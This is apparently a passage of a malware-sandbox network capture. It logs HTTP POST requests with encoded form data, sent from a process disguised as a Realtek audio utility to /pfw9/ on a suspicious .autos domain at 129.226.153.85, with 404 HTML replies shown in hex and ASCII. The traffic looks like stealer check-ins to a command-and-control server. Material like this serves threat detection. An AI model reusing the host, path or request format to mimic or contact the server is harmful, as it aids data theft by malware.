                                                                                                  Dec 3, 2024 09:52:35.576987028 CET701OUTPOST /pfw9/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.1qcczjvh2.autos
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 224
                                                                                                  Origin: http://www.1qcczjvh2.autos
                                                                                                  Referer: http://www.1qcczjvh2.autos/pfw9/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 31 37 4e 5a 56 42 4c 76 68 31 67 34 46 53 77 6e 6c 71 38 4f 35 37 54 4c 7a 51 72 6f 79 59 73 53 6f 70 61 63 65 67 64 62 59 58 76 79 33 35 6b 42 2b 67 6d 47 35 79 34 4e 42 45 44 50 78 34 65 76 7a 73 77 56 4f 38 35 4c 53 62 73 49 4a 76 56 39 4b 71 69 4a 4d 6d 31 4b 63 47 31 43 64 5a 72 6a 66 75 55 63 47 46 46 32 47 68 35 32 4a 6c 4e 77 5a 63 6d 65 37 6f 6b 5a 39 52 49 7a 43 67 32 77 6f 47 56 65 76 47 59 2b 42 44 41 42 6a 67 64 4a 58 45 67 70 78 79 32 43 61 55 6b 39 59 42 45 45 46 2b 72 75 72 47 49 73 35 32 55 6c 53 74 58 5a 75 46 4d 31 49 4f 49 34 55 4f 58 78 71 6d 45 53 58 56 7a 5a 34 46 39 2b 72 72 59 61 39 67 4d 36 4e 41 6f 6c 4b 4a 45 3d
                                                                                                  Data Ascii: 6aonl5x=17NZVBLvh1g4FSwnlq8O57TLzQroyYsSopacegdbYXvy35kB+gmG5y4NBEDPx4evzswVO85LSbsIJvV9KqiJMm1KcG1CdZrjfuUcGFF2Gh52JlNwZcme7okZ9RIzCg2woGVevGY+BDABjgdJXEgpxy2CaUk9YBEEF+rurGIs52UlStXZuFM1IOI4UOXxqmESXVzZ4F9+rrYa9gM6NAolKJE=
                                                                                                  Dec 3, 2024 09:52:35.927978039 CET1289INHTTP/1.1 404 Not Found
                                                                                                  Server: Tengine
                                                                                                  Date: Tue, 03 Dec 2024 08:52:35 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Content-Length: 58288
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  ETag: "67344967-e3b0"
                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                                                                  Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                                                                  Dec 3, 2024 09:52:35.927999973 CET1289INData Raw: 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41
                                                                                                  Data Ascii: v class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJ
                                                                                                  Dec 3, 2024 09:52:35.928096056 CET1289INData Raw: 65 2b 62 6a 71 39 61 44 35 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a 76 47 67 4b 6f 78 32 50 72 39 68 4f 49 78 32 47 35 45 51 4a 65 4c 33 6a 4d 49 6f 6c 64 44 39 33 34 70 74 50 39 6e 4b 79 52 41 54 35
                                                                                                  Data Ascii: e+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgxeN+x7dvTTSjHHwCPiXg4MLEwUl3eSQ8PyLRzXsgVrR/u
                                                                                                  Dec 3, 2024 09:52:35.928112984 CET246INData Raw: 43 5a 45 72 71 65 69 72 5a 4f 45 69 46 35 37 66 6c 7a 41 6b 42 4b 46 6d 53 50 32 6a 71 35 37 4d 6a 34 4d 67 44 57 51 52 62 34 43 38 36 79 57 4e 6f 6c 37 7a 30 53 49 7a 47 57 6d 4d 39 4d 43 31 6d 61 5a 6c 50 6a 46 5a 30 6d 4e 53 35 44 43 6d 37 37
                                                                                                  Data Ascii: CZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF8aHXuRBD5lGKdTEeh+V6bE71eI5LPpOULoCz67ByAJwr6uSyI+MrQt7VeunBMaskNt0QOc3bIomFbc8TgMmY3nG4nfv+a2i8o
                                                                                                  Dec 3, 2024 09:52:35.928128004 CET1289INData Raw: 41 42 61 68 6b 48 67 32 6a 73 50 5a 6d 48 6a 54 50 58 42 6f 6b 2b 39 77 43 77 44 62 61 57 79 37 49 6d 4f 6b 53 46 37 48 73 68 6c 6a 4a 54 48 34 6c 66 62 52 63 4a 41 6b 32 2b 6b 38 52 4f 56 74 6e 76 66 67 4d 42 36 48 35 58 70 73 37 76 36 70 4f 43
                                                                                                  Data Ascii: ABahkHg2jsPZmHjTPXBok+9wCwDbaWy7ImOkSF7HshljJTH4lfbRcJAk2+k8ROVtnvfgMB6H5Xps7v6pOC7pcnqGCqAgO+0kQ47BeoRlR8brAHwHoFH+4wyooQaVTjebo220+2njFZ3+9eqljVd0KgdgJh7VsQIAcBx2XLvDSoIeUcyoCGAVjW1bqDMhec0wwfbdmU+wtw4QJTt2KEWjwjzLLi7E47Bcj01HJPB0LzU9k2A/yj0
                                                                                                  Dec 3, 2024 09:52:35.928143978 CET1289INData Raw: 2f 44 67 41 6a 77 4f 79 35 55 51 4d 51 43 32 55 6d 42 4d 5a 74 47 55 43 35 56 51 57 42 6d 76 67 6c 67 42 59 4e 6d 52 38 65 30 41 4c 49 47 4e 44 7a 34 52 55 6e 76 57 61 7a 32 47 52 72 51 65 44 49 34 61 32 47 2b 61 6e 51 4b 4a 2f 31 71 48 4a 55 44
                                                                                                  Data Ascii: /DgAjwOy5UQMQC2UmBMZtGUC5VQWBmvglgBYNmR8e0ALIGNDz4RUnvWaz2GRrQeDI4a2G+anQKJ/1qHJUDIAnDEnh0ByMo1z76ZNr8i0jP7w+ZoiGbQ2HZvA4BO4BUkQLMyYJQDhjQbZgwEm5IOHhzD47BcCWNW2HBYREhnBBPUgv08wsS0K7+e/7QZgJ9hJ1SihJfmE6r2AoNGNUVZR2k2i9pp90v5T+W9kMkAMB+21RIAAAwI
                                                                                                  Dec 3, 2024 09:52:35.928158045 CET1289INData Raw: 50 44 73 63 34 31 42 31 6a 75 5a 71 56 31 58 50 58 69 73 4b 54 55 6e 50 52 66 63 68 67 37 50 75 76 34 44 75 38 71 50 67 48 56 76 41 58 31 2f 44 79 7a 63 67 42 65 42 6a 41 58 77 48 34 41 32 77 31 47 2f 54 53 44 55 64 38 32 7a 2b 50 2b 31 79 6b 79
                                                                                                  Data Ascii: PDsc41B1juZqV1XPXisKTUnPRfchg7Puv4Du8qPgHVvAX1/DyzcgBeBjAXwH4A2w1G/TSDUd82z+P+1ykyhocA3M7M7OJTp2oCGCs66NBsPd+gdEktAysy/CFQp5lIlbvlQqe2t9B+FGADWNR/z1k9jCUcCjTZTaL4+vqzU8MxI24gigrt8NGGZUpiIlHhOYUckAHGnYCf1naFZ4YkNt34n54SGox6jcGob2Yw6scC2AhZMPJry
                                                                                                  Dec 3, 2024 09:52:35.928247929 CET1289INData Raw: 38 43 41 41 71 6a 6e 2b 74 6c 4d 35 76 72 79 46 2b 38 37 4d 61 53 57 72 72 70 39 4b 4d 4a 39 73 42 66 76 34 41 33 67 62 77 43 34 42 59 67 31 48 2f 69 63 47 6f 2f 39 66 6d 75 5a 45 73 54 57 4c 7a 43 5a 39 6d 4d 72 64 6e 50 35 36 2f 44 71 76 34 71
                                                                                                  Data Ascii: 8CAAqjn+tlM5vryF+87MaSWrrp9KMJ9sBfv4A3gbwC4BYg1H/icGo/9fmuZEsTWLzCZ9mMrdnP56/Dqv4qAQyY7fAWFq22VKnkNZzmlauOpiGtewJnnvexi1uAYhwrOf/KaIAHLdnlGWyDv3pzJQuuJPSEwwPT5t9vZq1qdQ0niP6UxqGAeA4uhxapflB+OnsTQeBf3H6k8Go9zUY9R8gbykHwCDYcFYA4K9VzetQs1yLtxZsUq
                                                                                                  Dec 3, 2024 09:52:35.928267956 CET1289INData Raw: 39 56 38 61 6a 48 70 62 49 34 79 2f 6c 53 34 31 77 78 6b 41 6d 33 6c 6f 41 47 43 52 78 4a 61 52 47 61 74 4b 77 47 78 35 65 4c 64 51 46 43 2b 66 75 58 2b 33 4f 73 73 6e 42 4b 6a 6d 2b 5a 68 75 4e 53 65 75 51 70 32 4b 63 32 42 62 30 66 52 33 46 68
                                                                                                  Data Ascii: 9V8ajHpbI4y/lS41wxkAm3loAGCRxJaRGatKwGx5eLdQFC+fuX+3OssnBKjm+ZhuNSeuQp2Kc2Bb0fR3FhXrKW2fR7+QyNOQi3XYJTXX8vn5lHn1kZDaB7L8DgcVH9K8YoX9RCQCgIrn4unF93Oh4pWE5ZxjUbH/2A0kg1FfwhCrnwDCfsjrnbbzW/MgQlaQl3b05TupXQcv2VIJL9c7B7XwaAAuhy9wIHM+vLj1kOOxAOAqGPu
                                                                                                  Dec 3, 2024 09:52:35.928282976 CET1289INData Raw: 41 56 34 73 6b 70 53 64 51 41 49 30 47 6b 6d 55 39 66 65 41 6e 54 71 79 58 61 61 69 73 4d 39 4b 69 78 45 77 67 4f 41 2f 6f 30 2b 76 51 42 41 38 64 72 4a 6a 5a 53 73 52 5a 66 33 7a 43 42 6b 35 67 79 42 56 74 55 79 4c 64 64 36 55 38 50 7a 4f 30 61
                                                                                                  Data Ascii: AV4skpSdQAI0GkmU9feAnTqyXaaisM9KixEwgOA/o0+vQBA8drJjZSsRZf3zCBk5gyBVtUyLdd6U8PzO0at2c0gcB0UNHH6n5AOZTDqtQajfgRkJZW3ATiiQZUYoNP0G9dmZtcOCze9iK7PXYDAv2TDPgU66oqD5ufAYVGBcxIUriXawyUOq1e98LOQg8seIt2Uvdh4+fum5+9f6ww7tdnUnDA+pEGHfV8c2578tH/JFiqen+dg
                                                                                                  Dec 3, 2024 09:52:36.277518988 CET1289INData Raw: 30 31 5a 77 75 4b 57 4c 65 78 53 6c 4b 48 6e 30 38 76 58 48 52 36 77 49 35 50 77 62 42 55 61 59 4d 43 78 33 30 51 4d 72 37 44 79 53 39 4f 78 41 62 34 61 37 33 61 36 51 54 56 61 43 6a 63 38 63 6c 44 44 57 41 73 67 4b 30 47 6f 37 36 6d 41 39 65 35
                                                                                                  Data Ascii: 01ZwuKWLexSlKHn08vXHR6wI5PwbBUaYMCx30QMr7DyS9OxAb4a73a6QTVaCjc8clDDWAsgK0Go76mA9e5gh2AXcVJ/o/k+53xzek15Ut4n2hRpcQPjef+lg5v7XQF7V+EA9OcJ51+jSIvADhYyCkRchhKDIAoMPY8GHsawGtE+AWwcJCkJgB8FNxmi+t6bB+DUV/aYNR/C2AhlBUheYBVp+Ln9Aup3Th86uoEGh22J6/qktKR2


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  80192.168.11.3049947129.226.153.85805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:52:38.455188990 CET3818OUTPOST /pfw9/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.1qcczjvh2.autos
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 3340
                                                                                                  Origin: http://www.1qcczjvh2.autos
                                                                                                  Referer: http://www.1qcczjvh2.autos/pfw9/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 31 37 4e 5a 56 42 4c 76 68 31 67 34 46 53 77 6e 6c 71 38 4f 35 37 54 4c 7a 51 72 6f 79 59 73 53 6f 70 61 63 65 67 64 62 59 58 6e 79 77 4d 6f 42 34 48 53 47 6f 43 34 4e 66 55 44 4b 78 34 65 69 7a 73 6f 52 4f 38 46 31 53 5a 6b 49 49 4a 4a 39 4d 62 69 4a 48 6d 31 4b 56 6d 31 42 51 35 72 32 66 76 6b 6d 47 47 39 32 47 68 35 32 4a 6a 70 77 51 75 4f 65 35 6f 6b 65 71 68 49 42 47 67 33 58 6f 47 4e 4f 76 47 4d 55 42 42 67 42 6a 33 5a 4a 58 79 38 70 78 79 32 43 66 55 6b 38 59 42 49 48 46 2b 6a 41 72 44 31 5a 35 47 41 6c 52 4d 79 5a 36 6d 51 2f 62 49 63 72 59 66 6e 64 69 47 55 68 5a 6e 62 5a 33 55 52 59 72 70 63 72 79 6b 4d 68 57 42 42 69 54 65 4f 34 39 74 64 50 65 4a 52 42 31 67 79 6e 4e 4a 53 45 62 50 56 46 66 4f 4d 6b 79 7a 36 63 7a 69 54 41 38 59 50 5a 63 51 37 4b 50 63 43 6e 50 44 56 54 76 33 50 58 48 61 68 52 51 31 41 52 35 33 4f 75 57 6c 41 61 36 69 61 6e 55 6f 37 56 66 55 64 36 65 38 33 53 2b 33 4c 39 72 41 68 31 78 37 6a 62 75 32 4c 36 37 6a 4b 4c 5a 47 5a 44 46 47 61 2b 68 58 [TRUNCATED]
                                                                                                  Data Ascii: 6aonl5x=17NZVBLvh1g4FSwnlq8O57TLzQroyYsSopacegdbYXnywMoB4HSGoC4NfUDKx4eizsoRO8F1SZkIIJJ9MbiJHm1KVm1BQ5r2fvkmGG92Gh52JjpwQuOe5okeqhIBGg3XoGNOvGMUBBgBj3ZJXy8pxy2CfUk8YBIHF+jArD1Z5GAlRMyZ6mQ/bIcrYfndiGUhZnbZ3URYrpcrykMhWBBiTeO49tdPeJRB1gynNJSEbPVFfOMkyz6cziTA8YPZcQ7KPcCnPDVTv3PXHahRQ1AR53OuWlAa6ianUo7VfUd6e83S+3L9rAh1x7jbu2L67jKLZGZDFGa+hX+n+gPXMDwnl9WJOICJCQSPfBAtu7twdkwkP5qBVLRZhaZt4H+wtlG9d5x8kble/2MefuisTRZDf+4vYsf+dWfTO/GLf6+4PDpLb6CH5jmTa1uUG1G4uwpcXbYr7H/YjwttBxDY+NxOWPZ9Vw4uqRYdV9AmYRO7Nn5GSu0IR46sSbA8M5ibrhR5bFUrImy7XAVQTA3uaXMQR0GpTDr43dtab4Ky68ftI7dibfoS1xBurpuc0acOG68/kOnem0Xit/gyeIHWYUpMdGlWYaJW/x8R2XkcczrVgXeX8GPrzz38YWwrFlPJEzYN44hTmR4mgdmpTSfrOarYN//ubV6jiB+vA4ZUrKA2mk7FnCCarLBvm/heDdT1DDeAyswCUqUVo2INyyZcBA35eRfhm3yWVe1H55ahGIJFeN8EYzmWpGofVxntHAPAQSy7gON6VwH31wfbM/oC+V0uG0YCEoC3lgcrvEVo8/NzyZSvsqsNrGF3fU1rrg88vOTfgeKrEheyngP6JpZnymQs/+vvZuE51M0rG9fazJvSyyeeGOJV5rWibT70OYdKJBlYnnQqt0B893AHjReTiTvZMxu5+KOi+lS/Bgxd2+Xz31eXLPABjyqhMie3De6bwMfSCX1IxziZ517f41sQhBfOYTcJ8cAcDEf+/ac5YAs4m5Yj [TRUNCATED]
                                                                                                  Dec 3, 2024 09:52:38.811518908 CET1289INHTTP/1.1 404 Not Found
                                                                                                  Server: Tengine
                                                                                                  Date: Tue, 03 Dec 2024 08:52:38 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Content-Length: 58288
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  ETag: "67344967-e3b0"
                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                                                                  Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                                                                  Dec 3, 2024 09:52:38.811567068 CET1289INData Raw: 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41
                                                                                                  Data Ascii: v class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJ
                                                                                                  Dec 3, 2024 09:52:38.811604023 CET1289INData Raw: 65 2b 62 6a 71 39 61 44 35 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a 76 47 67 4b 6f 78 32 50 72 39 68 4f 49 78 32 47 35 45 51 4a 65 4c 33 6a 4d 49 6f 6c 64 44 39 33 34 70 74 50 39 6e 4b 79 52 41 54 35
                                                                                                  Data Ascii: e+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgxeN+x7dvTTSjHHwCPiXg4MLEwUl3eSQ8PyLRzXsgVrR/u
                                                                                                  Dec 3, 2024 09:52:38.811640978 CET1289INData Raw: 43 5a 45 72 71 65 69 72 5a 4f 45 69 46 35 37 66 6c 7a 41 6b 42 4b 46 6d 53 50 32 6a 71 35 37 4d 6a 34 4d 67 44 57 51 52 62 34 43 38 36 79 57 4e 6f 6c 37 7a 30 53 49 7a 47 57 6d 4d 39 4d 43 31 6d 61 5a 6c 50 6a 46 5a 30 6d 4e 53 35 44 43 6d 37 37
                                                                                                  Data Ascii: CZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF8aHXuRBD5lGKdTEeh+V6bE71eI5LPpOULoCz67ByAJwr6uSyI+MrQt7VeunBMaskNt0QOc3bIomFbc8TgMmY3nG4nfv+a2i8o
                                                                                                  Dec 3, 2024 09:52:38.811680079 CET1289INData Raw: 79 49 4e 51 42 68 35 62 67 30 41 31 67 5a 52 58 30 34 52 2b 4a 78 4a 69 58 52 52 4a 37 57 43 53 70 6a 53 68 4a 7a 30 69 4d 56 57 53 4d 2b 54 48 49 7a 69 72 50 70 74 72 4b 34 34 65 58 73 43 39 32 7a 6f 4d 6b 72 62 58 52 58 45 30 41 63 32 6a 73 58
                                                                                                  Data Ascii: yINQBh5bg0A1gZRX04R+JxJiXRRJ7WCSpjShJz0iMVWSM+THIzirPptrK44eXsC92zoMkrbXRXE0Ac2jsXy8tA7PrsLKtYkl4a7JhOwSCA/MMClyJx2G5Fg52XtNMc24a1ColeYTZD/6x7Mj41wCMt2XspeK/aVJ+5AH4eX+poG0LgD8U2P0jIaJbAK7as8sVxZ5rzkzpgxlxvcCYrXWp3gAb+uAPiTG70+Uci7U05FxCWzplHP
                                                                                                  Dec 3, 2024 09:52:38.811717987 CET1289INData Raw: 49 51 41 78 41 48 59 43 75 44 69 70 37 61 77 6e 35 30 32 6a 6f 71 63 49 44 50 41 57 69 42 72 69 64 73 49 57 42 50 68 2b 55 57 51 62 6f 6e 53 78 5a 70 43 50 57 6d 49 32 6c 52 38 79 33 36 72 66 5a 43 67 4e 62 39 6b 62 4f 6b 30 4c 4f 37 33 36 46 52
                                                                                                  Data Ascii: IQAxAHYCuDip7awn502joqcIDPAWiBridsIWBPh+UWQbonSxZpCPWmI2lR8y36rfZCgNb9kbOk0LO736FRDfZjPi/nPTk49bzZIADFt2ZLwXgIG2bBkQvPL4yhVswb7uNDqsKziuVyFmhEDv50RJiid5DarQB0GNIN91yLJUhZ9Nkb4MsCenYrfBqNdC1iJrCaAjgKYAyjMGFc8Tq+irG77kwPnf956/PQle6gtIwT2IzAv2K2/
                                                                                                  Dec 3, 2024 09:52:38.811745882 CET475INData Raw: 65 50 52 47 4b 74 4d 2b 4f 72 53 37 75 64 59 43 6c 58 47 31 41 6a 63 37 36 2f 57 47 50 38 62 6e 74 75 2b 42 62 62 66 76 2b 2f 2f 43 2b 45 4c 6a 74 49 76 4a 44 4a 75 32 5a 48 78 6e 77 4d 59 59 38 74 4f 6b 6c 6a 49 6a 36 63 6e 7a 32 46 66 37 42 78
                                                                                                  Data Ascii: ePRGKtM+OrS7udYClXG1Ajc76/WGP8bntu+Bbbfv+//C+ELjtIvJDJu2ZHxnwMYY8tOkljIj6cnz2Ff7BxGY9p2BNFfcj1EarSq2aKMrzb+kski4mHNLWuwj3Y3Qqo+DyLb3x+CXR35fzoGo54D0BpATwDdAJQpypYB4Ij+eLqk37C3Jq2Mx1PBU1DK78G64jlo+FdxzzoNPIUBaO9Mf5yKw+pVL/wCgO9yREvn12o0mXb8J+Pr
                                                                                                  Dec 3, 2024 09:52:38.811780930 CET1289INData Raw: 7a 65 74 51 73 31 79 4c 74 78 5a 73 55 71 46 47 2b 62 31 51 71 32 52 6e 52 62 67 4a 4c 59 58 68 75 76 6c 74 38 42 51 4f 77 41 69 35 70 4a 72 44 46 43 66 53 66 51 6b 42 35 6b 79 4c 61 57 6a 4d 2f 47 39 37 48 39 73 65 32 31 46 69 30 6a 57 35 66 31
                                                                                                  Data Ascii: zetQs1yLtxZsUqFG+b1Qq2RnRbgJLYXhuvlt8BQOwAi5pJrDFCfSfQkB5kyLaWjM/G97H9se21Fi0jW5f1TCR635atXVE6smxq5cXtY7oKGK45VU1W0C4DMA8Qaj/nODUV+rGP37u7gF28GEsEpibWBHJeSaCsqaAMDdumWD060Se2Sq7K9RzXg6oO8dBQvtkSwq9j81HXGEfiGRmQxstBLbTJN5GVsRKSI9+6OHTghcYyAslee
                                                                                                  Dec 3, 2024 09:52:38.811817884 CET1289INData Raw: 4c 6a 31 6b 4f 4f 78 41 4f 41 71 47 50 75 78 4f 50 30 75 6c 73 50 71 55 65 38 6a 45 34 42 6c 44 2f 35 6d 59 4e 56 2b 2b 6d 50 2f 68 6d 75 44 44 79 77 7a 69 39 62 50 43 74 6f 54 34 4f 32 76 31 73 32 39 6d 70 6d 79 59 66 36 4a 75 43 4f 39 79 34 66
                                                                                                  Data Ascii: Lj1kOOxAOAqGPuxOP0ulsPqUe8jE4BlD/5mYNV++mP/hmuDDywzi9bPCtoT4O2v1s29mpmyYf6JuCO9y4fU5on7zQH9DV/I29Z7DUb9BINRb3MR8G/kBGzLzIAB5dVmVg33kn/Jd9iM5Izr11Mz86/dWRpWLPExhTd/GQLfzUaTJshVZDw8zFwUIjddCMKeKwmr2LLZx5GVK69/qfjnPtt0KIUDLgBASS/1byinrQgim5Wh87BZ
                                                                                                  Dec 3, 2024 09:52:38.813234091 CET1289INData Raw: 37 38 74 48 2f 4a 46 69 71 65 6e 2b 64 67 4e 33 53 51 30 33 35 69 44 55 61 39 72 62 57 65 78 38 55 65 46 41 78 5a 4b 41 41 44 31 46 65 53 6a 33 5a 43 56 73 34 4f 79 4f 4c 4b 64 7a 4b 74 50 77 5a 62 52 61 6d 79 77 4e 47 4a 31 32 70 50 57 49 49 36
                                                                                                  Data Ascii: 78tH/JFiqen+dgN3SQ035iDUa9rbWex8UeFAxZKAAD1FeSj3ZCVs4OyOLKdzKtPwZbRamywNGJ12pPWII6FeeBiq51mMfX7GuPv7LDCtgJ6P0LVmLP1btrjjd5+jukZMb9kZJ+tYyf17wriekh4Dgl5ef/9qm5wahvDmAz5HVNxWu9DIBG4FdVLeHXYtiMtXtodNh2aFX/A8FWHU0TeOqJC2YTBPoRj5ZVO4pC/IMzuE4imbHCp
